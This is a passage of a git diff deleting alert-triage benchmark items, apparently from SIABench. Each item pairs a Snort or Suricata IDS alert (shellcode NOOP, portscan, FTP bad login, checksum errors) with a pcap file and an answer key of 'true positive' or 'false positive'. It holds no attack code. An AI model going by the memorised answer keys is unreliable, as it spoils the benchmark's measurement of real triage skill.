07/03-14:04:29.757515 [**] [1:1390:17] \"INDICATOR-SHELLCODE x86 inc ebx NOOP\" [**] [Classification: Executable code was detected] [Priority: 1] {TCP} 52.84.143.247:80 -> 192.168.10.17:58791", - "alert": "07/03-14:04:29.757515 [**] [1:1390:17] \"INDICATOR-SHELLCODE x86 inc ebx NOOP\" [**] [Classification: Executable code was detected] [Priority: 1] {TCP} 52.84.143.247:80 -> 192.168.10.17:58791", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "\nYou are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "false positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset_CIC/alert_31.json b/SIABench-main/Alert_Triaging_Dataset_CIC/alert_31.json deleted file mode 100644 index fbabc38425a6bf4a72441d4c236f4dd434f5a001..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset_CIC/alert_31.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "f1", - "alert_type": "True", - "alert_name": "true_alert_1" - } - }, - { - "sia_components": { - "scenario": "The soc team got an alert from the IDS. The alert is: 07/04-09:20:01.417087 [**] [1:491:15] \"PROTOCOL-FTP Bad login\" [**] [Classification: Potentially Bad Traffic] [Priority: 2] {TCP} 192.168.10.50:21 -> 172.16.0.1:60100", - "alert": "07/04-09:20:01.417087 [**] [1:491:15] \"PROTOCOL-FTP Bad login\" [**] [Classification: Potentially Bad Traffic] [Priority: 2] {TCP} 192.168.10.50:21 -> 172.16.0.1:60100", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "\nYou are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "true positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset_CIC/alert_32.json b/SIABench-main/Alert_Triaging_Dataset_CIC/alert_32.json deleted file mode 100644 index ba1cb8875e7a558b0dbfebb95ea41df81289ee28..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset_CIC/alert_32.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "s1", - "alert_type": "True", - "alert_name": "true_alert_2" - } - }, - { - "sia_components": { - "scenario": "The soc team got an alert from the IDS. The alert is: 07/07-13:55:01.154623 [**] [122:1:1] '(port_scan) TCP portscan' [**] [Priority: 3] {TCP} 172.16.0.1:41140 -> 192.168.10.50:5900", - "alert": "07/07-13:55:01.154623 [**] [122:1:1] \"(port_scan) TCP portscan\" [**] [Priority: 3] {TCP} 172.16.0.1:41140 -> 192.168.10.50:5900", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "\nYou are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "true positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset_CIC/alert_33.json b/SIABench-main/Alert_Triaging_Dataset_CIC/alert_33.json deleted file mode 100644 index 6073adcf9e85d2c33a69dd0b3ff1cfb6bf5c77bf..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset_CIC/alert_33.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "s2", - "alert_type": "True", - "alert_name": "true_alert_3" - } - }, - { - "sia_components": { - "scenario": "The soc team got an alert from the IDS. The alert is: 07/07-14:08:01.734199 [**] [122:1:1] \"(port_scan) TCP portscan\" [**] [Priority: 3] {TCP} 172.16.0.1:43959 -> 192.168.10.50:587", - "alert": "07/07-14:08:01.734199 [**] [122:1:1] \"(port_scan) TCP portscan\" [**] [Priority: 3] {TCP} 172.16.0.1:43959 -> 192.168.10.50:587", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "\nYou are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "true positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset_CIC/alert_34.json b/SIABench-main/Alert_Triaging_Dataset_CIC/alert_34.json deleted file mode 100644 index dd52cf3a1e282bf7df7271f2c3ab0bbc281f1c48..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset_CIC/alert_34.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "s3", - "alert_type": "True", - "alert_name": "true_alert_4" - } - }, - { - "sia_components": { - "scenario": "The soc team got an alert from the IDS. The alert is: 07/07-14:22:02.313683 [**] [122:1:1] \"(port_scan) TCP portscan\" [**] [Priority: 3] {TCP} 172.16.0.1:35609 -> 192.168.10.50:135", - "alert": "07/07-14:22:02.313683 [**] [122:1:1] \"(port_scan) TCP portscan\" [**] [Priority: 3] {TCP} 172.16.0.1:35609 -> 192.168.10.50:135", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "\nYou are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "true positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset_CIC/alert_35.json b/SIABench-main/Alert_Triaging_Dataset_CIC/alert_35.json deleted file mode 100644 index ef3a1b8538f7bfb88deb5dc27d0d519222d83324..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset_CIC/alert_35.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "sh1", - "alert_type": "True", - "alert_name": "true_alert_5" - } - }, - { - "sia_components": { - "scenario": "The soc team got an alert from the IDS. The alert is: 07/04-14:07:21.893671 [**] [1:1325:14] \"INDICATOR-SHELLCODE ssh CRC32 overflow filler\" [**] [Classification: Executable code was detected] [Priority: 1] {TCP} 172.16.0.1:52054 -> 192.168.10.50:22", - "alert": "07/04-14:07:21.893671 [**] [1:1325:14] \"INDICATOR-SHELLCODE ssh CRC32 overflow filler\" [**] [Classification: Executable code was detected] [Priority: 1] {TCP} 172.16.0.1:52054 -> 192.168.10.50:22", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "\nYou are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "true positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset_CIC/alert_4.json b/SIABench-main/Alert_Triaging_Dataset_CIC/alert_4.json deleted file mode 100644 index ec086e2a31f3633362c06b3fdcf027e7ee7773a4..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset_CIC/alert_4.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "lg1", - "alert_type": "False", - "alert_name": "false_alert_25" - } - }, - { - "sia_components": { - "scenario": "The soc team got an alert from the IDS. The alert is: 07/03-09:10:05.894236 [**] [1:1675:8] \"SERVER-ORACLE misparsed login response\" [**] [Classification: An attempted login using a suspicious username was detected] [Priority: 2] {TCP} 195.88.55.95:80 -> 192.168.10.9:65480", - "alert": "07/03-09:10:05.894236 [**] [1:1675:8] \"SERVER-ORACLE misparsed login response\" [**] [Classification: An attempted login using a suspicious username was detected] [Priority: 2] {TCP} 195.88.55.95:80 -> 192.168.10.9:65480", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "\nYou are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "false positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset_CIC/alert_5.json b/SIABench-main/Alert_Triaging_Dataset_CIC/alert_5.json deleted file mode 100644 index 06c12534fe35d75f00817d4480a683621725a71b..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset_CIC/alert_5.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "fs1", - "alert_type": "False", - "alert_name": "false_alert_26" - } - }, - { - "sia_components": { - "scenario": "The soc team got an alert from the IDS. The alert is: 07/07-08:00:50.818009 [**] [122:1:1] \"(port_scan) TCP portscan\" [**] [Priority: 3] {TCP} 192.168.10.3:88 -> 192.168.10.5:49175", - "alert": "07/07-08:00:50.818009 [**] [122:1:1] \"(port_scan) TCP portscan\" [**] [Priority: 3] {TCP} 192.168.10.3:88 -> 192.168.10.5:49175", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "\nYou are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "false positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset_CIC/alert_6.json b/SIABench-main/Alert_Triaging_Dataset_CIC/alert_6.json deleted file mode 100644 index f9d2c7a1864ba3946667f9308a43037d70739a9a..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset_CIC/alert_6.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "monday_pri_1", - "alert_type": "False", - "alert_name": "false_alert_27" - } - }, - { - "sia_components": { - "scenario": "The soc team got an alert from the IDS. The alert is: 07/03-08:20:06.886845 [**] [1:1394:17] \"INDICATOR-SHELLCODE x86 inc ecx NOOP\" [**] [Classification: Executable code was detected] [Priority: 1] {TCP} 104.27.144.213:80 -> 192.168.10.16:37956", - "alert": "07/03-08:20:06.886845 [**] [1:1394:17] \"INDICATOR-SHELLCODE x86 inc ecx NOOP\" [**] [Classification: Executable code was detected] [Priority: 1] {TCP} 104.27.144.213:80 -> 192.168.10.16:37956", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "\nYou are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "false positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset_CIC/alert_7.json b/SIABench-main/Alert_Triaging_Dataset_CIC/alert_7.json deleted file mode 100644 index 75e2c5dd94b051f3b4b7dd27aee411d01c1be2e8..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset_CIC/alert_7.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "monday_pri_2", - "alert_type": "False", - "alert_name": "false_alert_28" - } - }, - { - "sia_components": { - "scenario": "The soc team got an alert from the IDS. The alert is: 07/03-08:34:00.503373 [**] [1:648:18] \"INDICATOR-SHELLCODE x86 NOOP\" [**] [Classification: Executable code was detected] [Priority: 1] {TCP} 13.107.4.50:80 -> 192.168.10.15:49647", - "alert": "07/03-08:34:00.503373 [**] [1:648:18] \"INDICATOR-SHELLCODE x86 NOOP\" [**] [Classification: Executable code was detected] [Priority: 1] {TCP} 13.107.4.50:80 -> 192.168.10.15:49647", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "\nYou are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "false positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset_CIC/alert_8.json b/SIABench-main/Alert_Triaging_Dataset_CIC/alert_8.json deleted file mode 100644 index 4ad3de86834d86cac29257797c7394ed31b4b944..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset_CIC/alert_8.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "monday_pri_2_1", - "alert_type": "False", - "alert_name": "false_alert_29" - } - }, - { - "sia_components": { - "scenario": "The soc team got an alert from the IDS. The alert is: 07/03-08:09:42.792575 [**] [1:1201:13] \"INDICATOR-COMPROMISE 403 Forbidden\" [**] [Classification: Attempted Information Leak] [Priority: 2] {TCP} 165.254.0.104:80 -> 192.168.10.14:49961", - "alert": "07/03-08:09:42.792575 [**] [1:1201:13] \"INDICATOR-COMPROMISE 403 Forbidden\" [**] [Classification: Attempted Information Leak] [Priority: 2] {TCP} 165.254.0.104:80 -> 192.168.10.14:49961", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "\nYou are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "false positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset_CIC/alert_9.json b/SIABench-main/Alert_Triaging_Dataset_CIC/alert_9.json deleted file mode 100644 index ea6ac30cbb82928f381a8cd6cf7c9286ea8fc584..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset_CIC/alert_9.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "monday_pri_2_10", - "alert_type": "False", - "alert_name": "false_alert_30" - } - }, - { - "sia_components": { - "scenario": "The soc team got an alert from the IDS. The alert is: 07/03-13:40:10.893145 [**] [1:853:17] \"SERVER-WEBAPP wrap access\" [**] [Classification: Attempted Information Leak] [Priority: 2] {TCP} 192.168.10.14:57473 -> 125.1.77.19:80", - "alert": "07/03-13:40:10.893145 [**] [1:853:17] \"SERVER-WEBAPP wrap access\" [**] [Classification: Attempted Information Leak] [Priority: 2] {TCP} 192.168.10.14:57473 -> 125.1.77.19:80", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "\nYou are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "false positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset_TII/FP/scenario_dp_235492.json b/SIABench-main/Alert_Triaging_Dataset_TII/FP/scenario_dp_235492.json deleted file mode 100644 index e007374864562dd9975b26980040b89887d1d9de..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset_TII/FP/scenario_dp_235492.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_235492", - "alert_type": "False", - "alert_name": "dp_235492" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 1970-01-01T03:43:35.327264+0000 \"SURICATA Ethertype unknown\" {None} None:None -> None:None", - "alert": "1970-01-01T03:43:35.327264+0000 \"SURICATA Ethertype unknown\" {None} None:None -> None:None", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "false positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset_TII/FP/scenario_dp_235502.json b/SIABench-main/Alert_Triaging_Dataset_TII/FP/scenario_dp_235502.json deleted file mode 100644 index 9de2dcbee9efc7fcad6e2ef45cec92fd38a9980d..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset_TII/FP/scenario_dp_235502.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_235502", - "alert_type": "False", - "alert_name": "dp_235502" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 1970-01-01T04:14:59.548769+0000 \"SURICATA Ethertype unknown\" {None} None:None -> None:None", - "alert": "1970-01-01T04:14:59.548769+0000 \"SURICATA Ethertype unknown\" {None} None:None -> None:None", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "false positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset_TII/FP/scenario_dp_235537.json b/SIABench-main/Alert_Triaging_Dataset_TII/FP/scenario_dp_235537.json deleted file mode 100644 index c7f3f96394bf74d6a216eb34b197f881de933d84..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset_TII/FP/scenario_dp_235537.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_235537", - "alert_type": "False", - "alert_name": "dp_235537" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 1970-01-01T03:45:09.696540+0000 \"SURICATA STREAM Packet with invalid timestamp\" {TCP} 192.168.1.70:40050 -> 192.168.1.3:64738", - "alert": "1970-01-01T03:45:09.696540+0000 \"SURICATA STREAM Packet with invalid timestamp\" {TCP} 192.168.1.70:40050 -> 192.168.1.3:64738", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "false positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset_TII/FP/scenario_dp_235538.json b/SIABench-main/Alert_Triaging_Dataset_TII/FP/scenario_dp_235538.json deleted file mode 100644 index bea8ee0f45af1eef52a230211898c35c6c739c86..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset_TII/FP/scenario_dp_235538.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_235538", - "alert_type": "False", - "alert_name": "dp_235538" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 1970-01-01T03:45:09.696901+0000 \"SURICATA STREAM excessive retransmissions\" {TCP} 192.168.1.3:64738 -> 192.168.1.70:40050", - "alert": "1970-01-01T03:45:09.696901+0000 \"SURICATA STREAM excessive retransmissions\" {TCP} 192.168.1.3:64738 -> 192.168.1.70:40050", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "false positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset_TII/FP/scenario_dp_235767.json b/SIABench-main/Alert_Triaging_Dataset_TII/FP/scenario_dp_235767.json deleted file mode 100644 index 966bd0aa6093b4fc6683b7170f7554be0ec57cfd..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset_TII/FP/scenario_dp_235767.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_235767", - "alert_type": "False", - "alert_name": "dp_235767" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 1970-01-01T03:32:11.100215+0000 \"SURICATA UDPv6 invalid checksum\" {UDP} fe80:0000:0000:0000:0201:01ff:fe4f:78d3:5353 -> ff02:0000:0000:0000:0000:0000:0000:00fb:5353", - "alert": "1970-01-01T03:32:11.100215+0000 \"SURICATA UDPv6 invalid checksum\" {UDP} fe80:0000:0000:0000:0201:01ff:fe4f:78d3:5353 -> ff02:0000:0000:0000:0000:0000:0000:00fb:5353", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "false positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset_TII/FP/scenario_dp_235996.json b/SIABench-main/Alert_Triaging_Dataset_TII/FP/scenario_dp_235996.json deleted file mode 100644 index 8e27619bfeb91a0baf182f22f06c55a79d7529d6..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset_TII/FP/scenario_dp_235996.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_235996", - "alert_type": "False", - "alert_name": "dp_235996" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 1970-01-01T00:42:27.776303+0000 \"SURICATA STREAM excessive retransmissions\" {TCP} 192.168.1.90:35900 -> 192.168.1.70:8080", - "alert": "1970-01-01T00:42:27.776303+0000 \"SURICATA STREAM excessive retransmissions\" {TCP} 192.168.1.90:35900 -> 192.168.1.70:8080", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "false positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset_TII/FP/scenario_dp_236008.json b/SIABench-main/Alert_Triaging_Dataset_TII/FP/scenario_dp_236008.json deleted file mode 100644 index 31d5e86b416d78a6cd650cbb3ca6a350181de247..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset_TII/FP/scenario_dp_236008.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_236008", - "alert_type": "False", - "alert_name": "dp_236008" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 1970-01-01T00:52:42.044159+0000 \"SURICATA STREAM excessive retransmissions\" {TCP} 192.168.1.70:8080 -> 192.168.1.90:46582", - "alert": "1970-01-01T00:52:42.044159+0000 \"SURICATA STREAM excessive retransmissions\" {TCP} 192.168.1.70:8080 -> 192.168.1.90:46582", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "false positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset_TII/FP/scenario_dp_236015.json b/SIABench-main/Alert_Triaging_Dataset_TII/FP/scenario_dp_236015.json deleted file mode 100644 index ccd67f308b7f25053248d325df49a36257165712..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset_TII/FP/scenario_dp_236015.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_236015", - "alert_type": "False", - "alert_name": "dp_236015" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 1970-01-01T00:54:20.534904+0000 \"SURICATA UDPv6 invalid checksum\" {UDP} fe80:0000:0000:0000:0201:01ff:fe4f:78d3:5353 -> ff02:0000:0000:0000:0000:0000:0000:00fb:5353", - "alert": "1970-01-01T00:54:20.534904+0000 \"SURICATA UDPv6 invalid checksum\" {UDP} fe80:0000:0000:0000:0201:01ff:fe4f:78d3:5353 -> ff02:0000:0000:0000:0000:0000:0000:00fb:5353", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by 